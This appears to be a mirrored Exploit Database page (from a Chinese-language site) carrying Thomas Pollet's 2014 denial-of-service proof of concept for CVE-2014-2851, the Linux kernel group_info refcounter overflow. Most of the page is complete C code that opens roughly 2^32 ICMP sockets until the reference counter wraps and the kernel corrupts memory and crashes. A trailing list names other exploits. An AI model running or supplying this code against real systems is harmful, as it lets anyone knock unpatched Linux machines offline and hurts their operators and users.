Linux Kernel – ‘group_info’ refcounter Overflow Memory Corruption

Exploit Database
16 阅读

作者： Thomas Pollet

日期： 2014-04-18
类别：
- dos
平台：
- linux
来源：https://www.exploit-db.com/exploits/32926/

/*
 * DoS poc for CVE-2014-2851
 * Linux group_info refcounter overflow memory corruption
 *
 * https://lkml.org/lkml/2014/4/10/736
 *
 * @Tohmaxx - http://thomaspollet.blogspot.be
 *
 * If the app doesn't crash your system, try a different count (argv[1])
 * Execution takes a while because 2^32 socket() calls
 *
 */

#include <arpa/inet.h>
#include <stdio.h>
#include <sys/socket.h>
int main(int argc, char *argv[]) {
int i ;
struct sockaddr_in saddr;
unsigned count = (1UL<<32) - 20 ;
if(argc >= 2){
// Specify count
count = atoi(argv[1]);
}
printf("count 0x%x\n",count);
for(i = 0 ; (unsigned)i < count;i++ ){
socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
if ( i % ( 1 << 22 ) == 0 )
printf("%i \n",i);
}
//Now make it wrap and crash:
system("/bin/echo bye bye");
}

last Exploits
Linux Kernel – ‘group_info’ refcounter Overflow Memory Corruption的更多信息

Microsoft Internet Explorer – MSHTML Findtext Processing：
Mozilla Firefox 3.6 – XML Parser Memory Corruption (PoC) / Denial of Service：
Novel eDirectory DHost Console 8.8 SP3 – Local Overwrite (SEH)：
OsiriX DICOM Viewer 8.0.1 – Memory Corruption：
PostgreSQL – ‘bitsubstr’ Buffer Overflow：
Microsoft Windows Kernel – ‘IOCTL 0x120007 NsiGetParameter’ nsiproxy/netio Pool Memory Disclosure：
Notepad3 1.0.2.350 – Denial of Service (PoC)：
CommView 6.1 (Build 636) – Local Blue Screen of Death (Denial of Service)：